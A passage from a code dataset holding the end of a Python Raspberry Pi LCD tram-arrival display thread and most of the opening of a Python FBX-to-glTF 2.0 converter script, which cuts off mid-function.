{}:{:3}m\".format(\n info_list[0][0], info_list[0][1],\n info_list[1][0], info_list[1][1]), 2)\n\n\nclass DisplayThr(threading.Thread):\n \"\"\"Thread du traitement de l'affichage des arrivées de tram.\n\n Attributs:\n display: LiquidCrystalI2C\n logger: objet de log\n shared: liste de données partagées\n stop_event: objet event pour signaler l'arrêt du script\n Argument en plus:\n i2c_addr: adresse du module i2c\n i2c_bus: bus i2c du rpi\n \"\"\"\n def __init__(self, shared, stop_event, i2c_addr, i2c_bus):\n threading.Thread.__init__(self)\n self.logger = logging.getLogger(__name__)\n self.shared = shared\n self.stop_event = stop_event\n try:\n self.display = rpi_i2c_lcd.LiquidCrystalI2C(i2c_addr, i2c_bus)\n except OSError:\n self.logger.exception('Unconnected device.', exc_info=False)\n self.stop_event.set()\n 
sys.exit()\n\n\n def run(self):\n local_list = []\n shared_list = self.shared.list\n filt_list = [] # Tableau de tuples (nom_de_ligne, minutes_restantes)\n\n idle_animation = anim.DinoAnimation(self.display)\n\n while True:\n # Copie des données partagées\n with self.shared.lock:\n shared_data.copy_list(shared_list, local_list)\n\n # Filtrage pour ne retenir que les horaires valides (valeurs\n # positives)\n i = 0\n for itr in local_list:\n min_left = minutes_left(itr.expected_arriv)\n\n if min_left >= 0:\n try:\n filt_list[i] = (itr.line_ref, min_left)\n except IndexError:\n filt_list.append((itr.line_ref, min_left))\n finally:\n i = i + 1\n try:\n # Nothing to disclose, idle\n if i == 0:\n # Frames drawned by iterator\n for _ in idle_animation:\n if self.stop_event.wait(timeout=ANIM_REFRESH_TIME):\n break\n\n else:\n # Tri de précaution, garantit stable\n filt_list.sort(key=lambda tram: tram[1])\n self.display.set_cursor_at(0)\n display_header(self.display, local_list[0].station)\n if i == 1:\n display_one_tramway(self.display, filt_list)\n else:\n display_two_tramways(self.display, filt_list)\n\n except OSError:\n self.logger.exception('Connection error. Abort.',\n exc_info=False)\n self.stop_event.set()\n break\n\n if self.stop_event.wait(timeout=REFRESH_TIME):\n break\n","repo_name":"Jzavrk/CTS-tram-stop-monitoring","sub_path":"lcd_display.py","file_name":"lcd_display.py","file_ext":"py","file_size_in_byte":4091,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"30455067559","text":"# ############################################\n# fbx to glTF2.0 converter\n# glTF spec : https://github.com/KhronosGroup/glTF/blob/master/specification/2.0\n# fbx version 2018.1.1\n# TODO: texture flipY?\n# http://github.com/pissang/\n# ############################################\nimport sys, struct, json, os.path, math, argparse\n\ntry:\n from FbxCommon import *\nexcept ImportError:\n import platform\n msg = 'You need to copy the content in compatible subfolder under /lib/python into your python install folder such as '\n if platform.system() == 'Windows' or platform.system() == 'Microsoft':\n msg += '\"Python33/Lib/site-packages\"'\n elif platform.system() == 'Linux':\n msg += '\"/usr/local/lib/python3.3/site-packages\"'\n elif platform.system() == 'Darwin':\n msg += '\"/Library/Frameworks/Python.framework/Versions/3.3/lib/python3.3/site-packages\"'\n msg += ' folder.'\n print(msg)\n sys.exit(1)\n\nlib_materials = []\n\nlib_images = []\nlib_samplers = []\nlib_textures = []\n\n# attributes, indices, anim_parameters will be merged in accessors\nlib_attributes_accessors = []\nlib_indices_accessors = []\nlib_animation_accessors = []\nlib_ibm_accessors = []\nlib_accessors = []\n\nlib_buffer_views = []\nlib_buffers = []\n\nlib_cameras = []\nlib_meshes = []\n\nlib_nodes = []\nlib_scenes = []\n\nlib_skins = []\n\nlib_animations = []\n\n# Only python 3 support bytearray ?\n# http://dabeaz.blogspot.jp/2010/01/few-useful-bytearray-tricks.html\nattributeBuffer = bytearray()\nindicesBuffer = bytearray()\ninvBindMatricesBuffer = bytearray()\nanimationBuffer = bytearray()\n\nGL_RGBA = 0x1908\n\nGL_BYTE = 5120\nGL_UNSIGNED_BYTE = 5121\nGL_SHORT = 5122\nGL_UNSIGNED_SHORT = 5123\nGL_UNSIGNED_INT = 5125\nGL_FLOAT = 5126\n\nGL_REPEAT = 0x2901\n\n\nGL_TEXTURE_2D = 0x0DE1\nGL_TEXTURE_CUBE_MAP = 0x8513\nGL_REPEAT = 0x2901\nGL_CLAMP_TO_EDGE = 0x812F\nGL_NEAREST = 0x2600\nGL_LINEAR = 0x2601\nGL_NEAREST_MIPMAP_NEAREST = 0x2700\nGL_LINEAR_MIPMAP_NEAREST = 
0x2701\nGL_NEAREST_MIPMAP_LINEAR = 0x2702\nGL_LINEAR_MIPMAP_LINEAR = 0x2703\n\nGL_ARRAY_BUFFER = 0x8892\nGL_ELEMENT_ARRAY_BUFFER = 0x8893\n\n\nENV_QUANTIZE = False\nENV_FLIP_V = True\n\n_id = 0\ndef GetId():\n global _id\n _id = _id + 1\n return _id\n\ndef ListFromM4(m):\n return [m[0][0], m[0][1], m[0][2], m[0][3], m[1][0], m[1][1], m[1][2], m[1][3], m[2][0], m[2][1], m[2][2], m[2][3], m[3][0], m[3][1], m[3][2], m[3][3]]\n\ndef MatGetOpacity(pMaterial):\n lFactor = pMaterial.TransparencyFactor.Get()\n lColor = pMaterial.TransparentColor.Get()\n\n return 1.0 - lFactor * (lColor[0] + lColor[1] + lColor[2]) / 3;\n\n\ndef quantize(pList, pStride, pMin, pMax):\n lRange = range(pStride)\n lMultiplier = []\n lDivider = []\n # TODO dynamic precision? may lose info?\n lPrecision = 1e6\n for i in lRange:\n pMax[i] = math.ceil(pMax[i] * lPrecision) / lPrecision;\n pMin[i] = math.floor(pMin[i] * lPrecision) / lPrecision;\n if pMax[i] == pMin[i]:\n lMultiplier.append(0)\n lDivider.append(0)\n else:\n lDividerTmp = (pMax[i] - pMin[i]) / 65535;\n lDividerTmp = math.ceil(lDividerTmp * lPrecision) / lPrecision\n lDivider.append(lDividerTmp)\n lMultiplier.append(1 / lDividerTmp)\n\n lNewList = []\n for item in pList:\n if pStride == 1:\n lNewList.append(int((item - pMin[0]) * lMultiplier[0]))\n else:\n lNewItem = []\n for i in lRange:\n lNewItem.append(int((item[i] - pMin[i]) * lMultiplier[i]))\n lNewList.append(lNewItem)\n\n # TODO\n if pStride == 1:\n lDecodeMatrix = [\n lDivider[0], 0,\n pMin[0], 1\n ]\n elif pStride == 2:\n lDecodeMatrix = [\n lDivider[0], 0, 0,\n 0, lDivider[1], 0,\n pMin[0], pMin[1], 1\n ]\n elif pStride == 3:\n lDecodeMatrix = [\n lDivider[0], 0, 0, 0,\n 0, lDivider[1], 0, 0,\n 0, 0, lDivider[2], 0,\n pMin[0], pMin[1], pMin[2], 1\n ]\n elif pStride == 4:\n lDecodeMatrix = [\n lDivider[0], 0, 0, 0, 0,\n 0, lDivider[1], 0, 0, 0,\n 0, 0, lDivider[2], 0, 0,\n 0, 0, 0, lDivider[3], 0,\n pMin[0], pMin[1], pMin[2], pMin[3], 1\n ]\n\n return lNewList, lDecodeMatrix, pMin, pMax\n\n\ndef CreateAccessorBuffer(pList, pType, pStride, pMinMax=False, pQuantize=False):\n lGLTFAcessor = {}\n\n if pMinMax:\n if len(pList) > 0:\n if pStride == 1:\n lMin = [pList[0]]\n lMax = [pList[0]]\n elif pStride == 16:\n lMin = ListFromM4(pList[0])\n lMax = ListFromM4(pList[0])\n else:\n lMin = list(pList[0])[:pStride]\n lMax = list(pList[0])[:pStride]\n else:\n lMax = [0] * pStride\n lMin = [0] * pStride\n lRange = range(pStride)\n for item in pList:\n if pStride == 1:\n for i in lRange:\n lMin[i] = min(lMin[i], item)\n lMax[i] = max(lMax[i], item)\n else:\n if pStride == 16:\n item = ListFromM4(item)\n for i in lRange:\n lMin[i] = min(lMin[i], item[i])\n lMax[i] = max(lMax[i], item[i])\n\n if pQuantize and pType == 'f' and pStride <= 4:\n pList, lDecodeMatrix, lDecodedMin, lDecodedMax = quantize(pList, pStride, lMin[0:], lMax[0:])\n pType = 'H'\n # https://github.com/KhronosGroup/glTF/blob/master/extensions/Vendor/WEB3D_quantized_attributes\n lGLTFAcessor['extensions'] = {\n 'WEB3D_quantized_attributes': {\n 'decodedMin': lDecodedMin,\n 'decodedMax': lDecodedMax,\n 'decodeMatrix': lDecodeMatrix\n }\n }\n\n lPackType = '<' + pType * pStride\n lData = []\n #TODO: Other method to write binary buffer ?\n for item in pList:\n if pStride == 1:\n lData.append(struct.pack(lPackType, item))\n elif pStride == 2:\n lData.append(struct.pack(lPackType, item[0], item[1]))\n elif pStride == 3:\n lData.append(struct.pack(lPackType, item[0], item[1], item[2]))\n elif pStride == 4:\n lData.append(struct.pack(lPackType, item[0], 
item[1], item[2], item[3]))\n elif pStride == 16:\n m = item\n lData.append(struct.pack(lPackType, m[0][0], m[0][1], m[0][2], m[0][3], m[1][0], m[1][1], m[1][2], m[1][3], m[2][0], m[2][1], m[2][2], m[2][3], m[3][0], m[3][1], m[3][2], m[3][3]))\n\n if pType == 'f':\n lGLTFAcessor['componentType'] = GL_FLOAT\n # Unsigned Int\n elif pType == 'I':\n lGLTFAcessor['componentType'] = GL_UNSIGNED_INT\n\n # Unsigned Short\n elif pType == 'H':\n lGLTFAcessor['componentType'] = GL_UNSIGNED_SHORT\n\n if pStride == 1:\n lGLTFAcessor['type'] = 'SCALAR'\n elif pStride == 2:\n lGLTFAcessor['type'] = 'VEC2'\n elif pStride == 3:\n lGLTFAcessor['type'] = 'VEC3'\n elif pStride == 4:\n lGLTFAcessor['type'] = 'VEC4'\n elif pStride == 9:\n lGLTFAcessor['type'] = 'MAT3'\n elif pStride == 16:\n lGLTFAcessor['type'] = 'MAT4'\n\n lGLTFAcessor['byteOffset'] = 0\n lGLTFAcessor['count'] = len(pList)\n\n if pMinMax:\n lGLTFAcessor['max'] = lMax\n lGLTFAcessor['min'] = lMin\n\n return b''.join(lData), lGLTFAcessor\n\ndef appendToBuffer(pType, pBuffer, pData, pObj):\n lByteOffset = len(pBuffer)\n if pType == 'f' or pType == 'I':\n # should be a multiple of 4 for alignment\n if lByteOffset % 4 == 2:\n pBuffer.extend(b'\\x00\\x00')\n lByteOffset += 2\n\n pObj['byteOffset'] = lByteOffset\n pBuffer.extend(pData)\n\ndef CreateAttributeBuffer(pList, pType, pStride):\n lData, lGLTFAttribute = CreateAccessorBuffer(pList, pType, pStride, True, ENV_QUANTIZE)\n appendToBuffer(pType, attributeBuffer, lData, lGLTFAttribute)\n idx = len(lib_accessors)\n lib_attributes_accessors.append(lGLTFAttribute)\n lib_accessors.append(lGLTFAttribute)\n return idx\n\n\ndef CreateIndicesBuffer(pList, pType):\n # Sketchfab needs all accessor have min, max?\n lData, lGLTFIndices = CreateAccessorBuffer(pList, pType, 1, True)\n appendToBuffer(pType, indicesBuffer, lData, lGLTFIndices)\n idx = len(lib_accessors)\n lib_indices_accessors.append(lGLTFIndices)\n lib_accessors.append(lGLTFIndices)\n return idx\n\ndef CreateAnimationBuffer(pList, pType, pStride):\n lData, lGLTFAnimSampler = CreateAccessorBuffer(pList, pType, pStride, True)\n\n # PENDING\n # lAllSame = True\n # for i in range(pStride):\n # if lGLTFAnimSampler['min'][i] != lGLTFAnimSampler['max'][i]:\n # lAllSame = False\n # # Just ignore it.\n # if lAllSame:\n # return -1\n\n appendToBuffer(pType, animationBuffer, lData, lGLTFAnimSampler)\n\n idx = len(lib_accessors)\n lib_animation_accessors.append(lGLTFAnimSampler)\n lib_accessors.append(lGLTFAnimSampler)\n return idx\n\ndef CreateIBMBuffer(pList):\n lData, lGLTFIBM = CreateAccessorBuffer(pList, 'f', 16, True)\n appendToBuffer('f', invBindMatricesBuffer, lData, lGLTFIBM)\n idx = len(lib_accessors)\n lib_ibm_accessors.append(lGLTFIBM)\n lib_accessors.append(lGLTFIBM)\n return idx\n\n\ndef CreateImage(pPath):\n lImageIndices = [idx for idx in range(len(lib_images)) if lib_images[idx]['uri'] == pPath]\n if len(lImageIndices):\n return lImageIndices[0]\n\n lImageIdx = len(lib_images)\n lib_images.append({\n 'uri' : pPath\n })\n return lImageIdx\n\ndef HashSampler(pTexture):\n lHashStr = []\n # Wrap S\n lHashStr.append(str(pTexture.WrapModeU.Get()))\n # Wrap T\n lHashStr.append(str(pTexture.WrapModeV.Get()))\n return ' '.join(lHashStr)\n\ndef ConvertWrapMode(pWrap):\n if pWrap == FbxTexture.eRepeat:\n return GL_REPEAT\n elif pWrap == FbxTexture.eClamp:\n return GL_CLAMP_TO_EDGE\n\n_samplerHashMap = {}\ndef CreateSampler(pTexture):\n lHashKey = HashSampler(pTexture)\n if lHashKey in _samplerHashMap:\n return _samplerHashMap[lHashKey]\n else:\n 
lSamplerIdx = len(lib_samplers)\n lib_samplers.append({\n 'wrapS' : ConvertWrapMode(pTexture.WrapModeU.Get()),\n 'wrapT' : ConvertWrapMode(pTexture.WrapModeV.Get()),\n # Texture filter in fbx ?\n 'minFilter' : GL_LINEAR_MIPMAP_LINEAR,\n 'magFilter' : GL_LINEAR\n })\n _samplerHashMap[lHashKey] = lSamplerIdx\n return lSamplerIdx\n\n_textureHashMap = {}\ndef CreateTexture(pProperty):\n lTextureList = []\n\n lFileTextures = []\n lLayeredTextureCount = pProperty.GetSrcObjectCount(FbxCriteria.ObjectType(FbxLayeredTexture.ClassId))\n if lLayeredTextureCount > 0:\n for i in range(lLayeredTextureCount):\n lLayeredTexture = pProperty.GetSrcObject(FbxCriteria.ObjectType(FbxLayeredTexture.ClassId), i)\n for j in range(lLayeredTexture.GetSrcObjectCount(FbxCriteria.ObjectType(FbxTexture.ClassId))):\n lTexture = lLayeredTexture.GetSrcObject(FbxCriteria.ObjectType(FbxTexture.ClassId), j)\n if lTexture and lTexture.__class__ == FbxFileTexture:\n lFileTextures.append(lTexture)\n pass\n else:\n lTextureCount = pProperty.GetSrcObjectCount(FbxCriteria.ObjectType(FbxTexture.ClassId))\n for t in range(lTextureCount):\n lTexture = pProperty.GetSrcObject(FbxCriteria.ObjectType(FbxTexture.ClassId), t)\n if lTexture and lTexture.__class__ == FbxFileTexture:\n lFileTextures.append(lTexture)\n\n for lTexture in lFileTextures:\n try:\n lTextureFileName = lTexture.GetFileName()\n except UnicodeDecodeError:\n print('Get texture file name error.')\n continue\n lImageIdx = CreateImage(lTextureFileName)\n lSamplerIdx = CreateSampler(lTexture)\n lHashKey = (lImageIdx, lSamplerIdx)\n if lHashKey in _textureHashMap:\n lTextureList.append(_textureHashMap[lHashKey])\n else:\n lTextureIdx = len(lib_textures)\n lib_textures.append({\n 'format' : GL_RGBA,\n 'internalFormat' : GL_RGBA,\n 'sampler' : lSamplerIdx,\n 'source' : lImageIdx,\n 'target' : GL_TEXTURE_2D\n })\n _textureHashMap[lHashKey] = lTextureIdx\n lTextureList.append(lTextureIdx)\n # PENDING Return the first texture ?\n if len(lTextureList) > 0:\n return lTextureList[0]\n else:\n return None\n\ndef ConvertMaterial(pMaterial):\n lMaterialName = pMaterial.GetName()\n\n lGLTFMaterial = {\n \"name\" : lMaterialName,\n # TODO PBR\n \"extensions\": {\n \"KHR_materials_common\": {\n \"technique\": \"BLINN\",\n # Compatible with three.js loaders\n \"type\": \"commonBlinn\",\n \"values\": {}\n }\n }\n }\n lValues = lGLTFMaterial['extensions']['KHR_materials_common']['values']\n lShading = pMaterial.ShadingModel.Get()\n\n lMaterialIdx = len(lib_materials)\n if (lShading == 'unknown'):\n lib_materials.append(lGLTFMaterial)\n return lMaterialIdx\n\n lValues['ambient'] = list(pMaterial.Ambient.Get())\n lValues['emission'] = list(pMaterial.Emissive.Get())\n\n lTransparency = MatGetOpacity(pMaterial)\n if lTransparency < 1:\n lValues['transparency'] = lTransparency\n lValues['transparent'] = True\n\n # Use diffuse map\n # TODO Diffuse Factor ?\n if pMaterial.Diffuse.GetSrcObjectCount() > 0:\n lTextureIdx = CreateTexture(pMaterial.Diffuse)\n if not lTextureIdx == None:\n lValues['diffuse'] = lTextureIdx\n else:\n lValues['diffuse'] = list(pMaterial.Diffuse.Get())\n\n if pMaterial.Bump.GetSrcObjectCount() > 0:\n # TODO 3dsmax use the normal map as bump map ?\n lTextureIdx = CreateTexture(pMaterial.Bump)\n if not lTextureIdx == None:\n lGLTFMaterial['normalTexture'] = {\n \"index\": lTextureIdx\n }\n\n if pMaterial.NormalMap.GetSrcObjectCount() > 0:\n lTextureIdx = CreateTexture(pMaterial.NormalMap)\n if not lTextureIdx == None:\n lGLTFMaterial['normalTexture'] = {\n \"index\": 
lTextureIdx\n }\n # PENDING\n if lShading == 'phong' or lShading == 'Phong':\n lValues['shininess'] = pMaterial.Shininess.Get()\n # Use specular map\n # TODO Specular Factor ?\n if pMaterial.Specular.GetSrcObjectCount() > 0:\n pass\n else:\n lValues['specular'] = list(pMaterial.Specular.Get())\n\n lib_materials.append(lGLTFMaterial)\n return lMaterialIdx\n\ndef ConvertToPBRMaterial(pMaterial):\n lMaterialName = pMaterial.GetName()\n lShading = str(pMaterial.ShadingModel.Get()).lower()\n\n lGLTFMaterial = {\n \"name\" : lMaterialName,\n \"pbrMetallicRoughness\": {\n \"baseColorFactor\": [1, 1, 1, 1],\n \"metallicFactor\": 0,\n \"roughnessFactor\": 1\n }\n }\n lValues = lGLTFMaterial[\"pbrMetallicRoughness\"];\n\n lMaterialIdx = len(lib_materials)\n\n if (lShading == 'unknown'):\n lib_materials.append(lGLTFMaterial)\n return lMaterialIdx\n\n lGLTFMaterial['emissiveFactor'] = list(pMaterial.Emissive.Get())\n\n lTransparency = MatGetOpacity(pMaterial)\n if lTransparency < 1:\n lGLTFMaterial['alphaMode'] = 'BLEND'\n lValues['baseColorFactor'][3] = lTransparency\n\n # Use diffuse map\n # TODO Diffuse Factor ?\n if pMaterial.Diffuse.GetSrcObjectCount() > 0:\n lTextureIdx = CreateTexture(pMaterial.Diffuse)\n if not lTextureIdx == None:\n lValues['baseColorTexture'] = {\n \"index\": lTextureIdx,\n \"texCoord\": 0\n }\n else:\n lValues['baseColorFactor'][0:3] = list(pMaterial.Diffuse.Get())\n\n if pMaterial.Bump.GetSrcObjectCount() > 0:\n # TODO 3dsmax use the normal map as bump map ?\n lTextureIdx = CreateTexture(pMaterial.Bump)\n if not lTextureIdx == None:\n lGLTFMaterial['normalTexture'] = {\n \"index\": lTextureIdx,\n \"texCoord\": 0\n }\n\n if pMaterial.NormalMap.GetSrcObjectCount() > 0:\n lTextureIdx = CreateTexture(pMaterial.NormalMap)\n if not lTextureIdx == None:\n lGLTFMaterial['normalTexture'] = {\n \"index\": lTextureIdx,\n \"texCoord\": 0\n }\n # PENDING\n\n if lShading == 'phong':\n lGLossiness = math.log(pMaterial.Shininess.Get()) / math.log(8192)\n lValues['roughnessFactor'] = min(max(1 - lGLossiness, 0), 1)\n\n lib_materials.append(lGLTFMaterial)\n return lMaterialIdx\n\n\ndef ConvertVertexLayer(pMesh, pLayer, pOutput):\n lMappingMode = pLayer.GetMappingMode()\n lReferenceMode = pLayer.GetReferenceMode()\n\n if lMappingMode == FbxLayerElement.eByControlPoint:\n if lReferenceMode == FbxLayerElement.eDirect:\n for vec in pLayer.GetDirectArray():\n pOutput.append(vec)\n elif lReferenceMode == FbxLayerElement.eIndexToDirect:\n lIndexArray = pLayer.GetIndexArray()\n lDirectArray = pLayer.GetDirectArray()\n for idx in lIndexArray:\n pOutput.append(lDirectArray.GetAt(idx))\n\n return False\n elif lMappingMode == FbxLayerElement.eByPolygonVertex:\n if lReferenceMode == FbxLayerElement.eDirect:\n for vec in pLayer.GetDirectArray():\n pOutput.append(vec)\n # Need to split vertex\n # TODO: Normal per vertex will still have ByPolygonVertex in COLLADA\n elif lReferenceMode == FbxLayerElement.eIndexToDirect:\n lIndexArray = pLayer.GetIndexArray()\n lDirectArray = pLayer.GetDirectArray()\n for idx in lIndexArray:\n pOutput.append(lDirectArray.GetAt(idx))\n else:\n print(\"Unsupported mapping mode \" + lMappingMode)\n\n return True\n\ndef CreateSkin():\n lSkinIdx = len(lib_skins)\n # https://github.com/KhronosGroup/glTF/issues/100\n lib_skins.append({\n 'joints' : [],\n })\n\n return lSkinIdx\n\n_defaultMaterialName = 'DEFAULT_MAT_'\n_defaultMaterialIndex = 0\n\ndef ConvertMesh(pScene, pMesh, pNode, pSkin, pClusters):\n\n global _defaultMaterialIndex\n\n lGLTFPrimitive = {}\n lPositions = []\n 
lNormals = []\n lTexcoords = []\n lTexcoords2 = []\n lIndices = []\n\n lWeights = []\n lJoints = []\n # Count joint number of each vertex\n lJointCounts = []\n\n # Only consider layer 0\n lLayer = pMesh.GetLayer(0)\n # Uv of lightmap on layer 1\n # PENDING Uv2 always on layer 1?\n lLayer2 = pMesh.GetLayer(1)\n\n if lLayer:\n ## Handle material\n lLayerMaterial = lLayer.GetMaterials()\n lMaterial = None\n if not lLayerMaterial:\n print(\"Mesh \" + pNode.GetName() + \" doesn't have material\")\n lMaterial = FbxSurfacePhong.Create(pScene, _defaultMaterialName + str(_defaultMaterialIndex))\n _defaultMaterialIndex += 1\n else:\n # Mapping Mode of material must be eAllSame\n # Because the mesh has been splitted by material\n idx = lLayerMaterial.GetIndexArray()[0]\n lMaterial = pNode.GetMaterial(idx)\n lMaterialKey = ConvertToPBRMaterial(lMaterial)\n lGLTFPrimitive[\"material\"] = lMaterialKey\n\n lNormalSplitted = False\n lUvSplitted = False\n lUv2Splitted = False\n ## Handle normals\n lLayerNormal = lLayer.GetNormals()\n if lLayerNormal:\n lNormalSplitted = ConvertVertexLayer(pMesh, lLayerNormal, lNormals)\n if len(lNormals) == 0:\n lLayerNormal = None\n\n ## Handle uvs\n lLayerUV = lLayer.GetUVs()\n\n lLayer2Uv = None\n\n if lLayerUV:\n lUvSplitted = ConvertVertexLayer(pMesh, lLayerUV, lTexcoords)\n if ENV_FLIP_V:\n for i in range(len(lTexcoords)):\n # glTF2.0 don't flipY. So flip the uv.\n lTexcoords[i] = [lTexcoords[i][0], 1.0 - lTexcoords[i][1]]\n if len(lTexcoords) == 0:\n lLayerUV = None\n\n if lLayer2:\n lLayer2Uv = lLayer2.GetUVs()\n if lLayer2Uv:\n lUv2Splitted = ConvertVertexLayer(pMesh, lLayer2Uv, lTexcoords2)\n if ENV_FLIP_V:\n for i in range(len(lTexcoords2)):\n lTexcoords2[i] = [lTexcoords2[i][0], 1.0 - lTexcoords2[i][1]]\n if len(lTexcoords2) == 0:\n lLayer2Uv = None\n\n hasSkin = False\n moreThanFourJoints = False\n lMaxJointCount = 0\n ## Handle Skinning data\n if (pMesh.GetDeformerCount(FbxDeformer.eSkin) > 0):\n hasSkin = True\n lControlPointsCount = pMesh.GetControlPointsCount()\n for i in range(lControlPointsCount):\n lWeights.append([0, 0, 0, 0])\n # -1 can't used in UNSIGNED_SHORT\n lJoints.append([0, 0, 0, 0])\n lJointCounts.append(0)\n\n for i in range(pMesh.GetDeformerCount(FbxDeformer.eSkin)):\n lDeformer = pMesh.GetDeformer(i, FbxDeformer.eSkin)\n\n for i2 in range(lDeformer.GetClusterCount()):\n lCluster = lDeformer.GetCluster(i2)\n lNode = lCluster.GetLink()\n lJointIndex = -1\n lNodeIdx = GetNodeIdx(lNode)\n if not lNodeIdx in pSkin['joints']:\n lJointIndex = len(pSkin['joints'])\n pSkin['joints'].append(lNodeIdx)\n\n pClusters[lNodeIdx] = lCluster\n else:\n lJointIndex = pSkin['joints'].index(lNodeIdx)\n\n lControlPointIndices = lCluster.GetControlPointIndices()\n lControlPointWeights = lCluster.GetControlPointWeights()\n\n for i3 in range(lCluster.GetControlPointIndicesCount()):\n lControlPointIndex = lControlPointIndices[i3]\n lControlPointWeight = lControlPointWeights[i3]\n lJointCount = lJointCounts[lControlPointIndex]\n\n # At most binding four joint per vertex\n if lJointCount <= 3:\n # Joint index\n lJoints[lControlPointIndex][lJointCount] = lJointIndex\n lWeights[lControlPointIndex][lJointCount] = lControlPointWeight\n else:\n moreThanFourJoints = True\n # More than four joints, replace joint of minimum Weight\n lMinW, lMinIdx = min( (lWeights[lControlPointIndex][i], i) for i in range(len(lWeights[lControlPointIndex])) )\n lJoints[lControlPointIndex][lMinIdx] = lJointIndex\n lWeights[lControlPointIndex][lMinIdx] = lControlPointWeight\n lMaxJointCount = 
max(lMaxJointCount, lJointIndex)\n lJointCounts[lControlPointIndex] += 1\n if moreThanFourJoints:\n print('More than 4 joints (%d joints) bound to per vertex in %s. ' %(lMaxJointCount, pNode.GetName()))\n\n # Weight is VEC3 because it is normalized\n # TODO Seems most engines needs VEC4 weights.\n # for i in range(len(lWeights)):\n # lWeights[i] = lWeights[i][:3]\n\n if lNormalSplitted or lUvSplitted or lUv2Splitted:\n lCount = 0\n lVertexCount = 0\n lNormalsTmp = []\n lTexcoordsTmp = []\n lTexcoords2Tmp = []\n lJointsTmp = []\n lWeightsTmp = []\n lVertexMap = {}\n\n for idx in pMesh.GetPolygonVertices():\n lPosition = pMesh.GetControlPointAt(idx)\n if not lNormalSplitted:\n # Split normal data\n lNormal = lNormals[idx]\n else:\n lNormal = lNormals[lCount]\n\n if lLayerUV:\n if not lUvSplitted:\n lTexcoord = lTexcoords[idx]\n else:\n lTexcoord = lTexcoords[lCount]\n\n if lLayer2Uv:\n if not lUv2Splitted:\n lTexcoord = lTexcoords2[idx]\n else:\n lTexcoord2 = lTexcoords2[lCount]\n\n lCount += 1\n\n #Compress vertex, hashed with position and normal\n if lLayer2Uv:\n if lLayer2Uv:\n lKey = (lPosition[0], lPosition[1], lPosition[2], lNormal[0], lNormal[1], lNormal[2], lTexcoord[0], lTexcoord[1], lTexcoord2[0], lTexcoord2[1])\n else:\n lKey = (lPosition[0], lPosition[1], lPosition[2], lNormal[0], lNormal[1], lNormal[2], lTexcoord2[0], lTexcoord2[1])\n elif lLayerUV:\n lKey = (lPosition[0], lPosition[1], lPosition[2], lNormal[0], lNormal[1], lNormal[2], lTexcoord[0], lTexcoord[1])\n else:\n lKey = (lPosition[0], lPosition[1], lPosition[2], lNormal[0], lNormal[1], lNormal[2])\n\n if lKey in lVertexMap:\n lIndices.append(lVertexMap[lKey])\n else:\n lPositions.append(lPosition)\n lNormalsTmp.append(lNormal)\n\n if lLayerUV:\n lTexcoordsTmp.append(lTexcoord)\n\n if lLayer2Uv:\n lTexcoords2Tmp.append(lTexcoord2)\n\n if hasSkin:\n lWeightsTmp.append(lWeights[idx])\n lJointsTmp.append(lJoints[idx])\n lIndices.append(lVertexCount)\n lVertexMap[lKey] = lVertexCount\n lVertexCount += 1\n\n lNormals = lNormalsTmp\n lTexcoords = lTexcoordsTmp\n lTexcoords2 = lTexcoords2Tmp\n\n if hasSkin:\n lWeights = lWeightsTmp\n lJoints = lJointsTmp\n else:\n lIndices = pMesh.GetPolygonVertices()\n lPositions = pMesh.GetControlPoints()\n\n lGLTFPrimitive['attributes'] = {}\n lGLTFPrimitive['attributes']['POSITION'] = CreateAttributeBuffer(lPositions, 'f', 3)\n if not lLayerNormal == None:\n lGLTFPrimitive['attributes']['NORMAL'] = CreateAttributeBuffer(lNormals, 'f', 3)\n if lLayerUV:\n lGLTFPrimitive['attributes']['TEXCOORD_0'] = CreateAttributeBuffer(lTexcoords, 'f', 2)\n if lLayer2Uv:\n lGLTFPrimitive['attributes']['TEXCOORD_1'] = CreateAttributeBuffer(lTexcoords2, 'f', 2)\n if hasSkin:\n # PENDING UNSIGNED_SHORT will have bug.\n lGLTFPrimitive['attributes']['JOINTS_0'] = CreateAttributeBuffer(lJoints, 'H', 4)\n # TODO Seems most engines needs VEC4 weights.\n lGLTFPrimitive['attributes']['WEIGHTS_0'] = CreateAttributeBuffer(lWeights, 'f', 4)\n\n if len(lPositions) >= 0xffff:\n #Use unsigned int in element indices\n lIndicesType = 'I'\n else:\n lIndicesType = 'H'\n lGLTFPrimitive['indices'] = CreateIndicesBuffer(lIndices, lIndicesType)\n\n return lGLTFPrimitive\n else:\n return None\n\ndef ConvertCamera(pCamera):\n lGLTFCamera = {}\n\n if pCamera.ProjectionType.Get() == FbxCamera.ePerspective:\n lGLTFCamera['type'] = 'perspective'\n lGLTFCamera['perspective'] = {\n \"yfov\": pCamera.FieldOfView.Get(),\n \"znear\": pCamera.NearPlane.Get(),\n \"zfar\": pCamera.FarPlane.Get()\n }\n elif pCamera.ProjectionType.Get() == 
FbxCamera.eOrthogonal:\n lGLTFCamera['type'] = 'orthographic'\n lGLTFCamera['orthographic'] = {\n # PENDING\n \"xmag\": pCamera.OrthoZoom.Get(),\n \"ymag\": pCamera.OrthoZoom.Get(),\n \"znear\": pCamera.NearPlane.Get(),\n \"zfar\": pCamera.FarPlane.Get()\n }\n\n lCameraIdx = len(lib_cameras)\n lib_cameras.append(lGLTFCamera)\n return lCameraIdx\n\ndef ConvertSceneNode(pScene, pNode, pPoseTime):\n lGLTFNode = {}\n lNodeName = pNode.GetName()\n lGLTFNode['name'] = pNode.GetName()\n\n lib_nodes.append(lGLTFNode)\n\n # Transform matrix\n lGLTFNode['matrix'] = ListFromM4(pNode.EvaluateLocalTransform(pPoseTime, FbxNode.eDestinationPivot))\n\n #PENDING : Triangulate and split all geometry not only the default one ?\n #PENDING : Multiple node use the same mesh ?\n lGeometry = pNode.GetGeometry()\n if not lGeometry == None:\n lMeshKey = lNodeName\n lMeshName = lGeometry.GetName()\n if lMeshName == '':\n lMeshName = lMeshKey\n\n lGLTFMesh = {'name' : lMeshName}\n\n lHasSkin = False\n lGLTFSkin = None\n lClusters = {}\n\n # If any attribute of this node have skinning data\n # (Mesh splitted by material may have multiple MeshAttribute in one node)\n for i in range(pNode.GetNodeAttributeCount()):\n lNodeAttribute = pNode.GetNodeAttributeByIndex(i)\n if lNodeAttribute.GetAttributeType() == FbxNodeAttribute.eMesh:\n if (lNodeAttribute.GetDeformerCount(FbxDeformer.eSkin) > 0):\n lHasSkin = True\n if lHasSkin:\n lSkinIdx = CreateSkin()\n lGLTFSkin = lib_skins[lSkinIdx]\n lGLTFNode['skin'] = 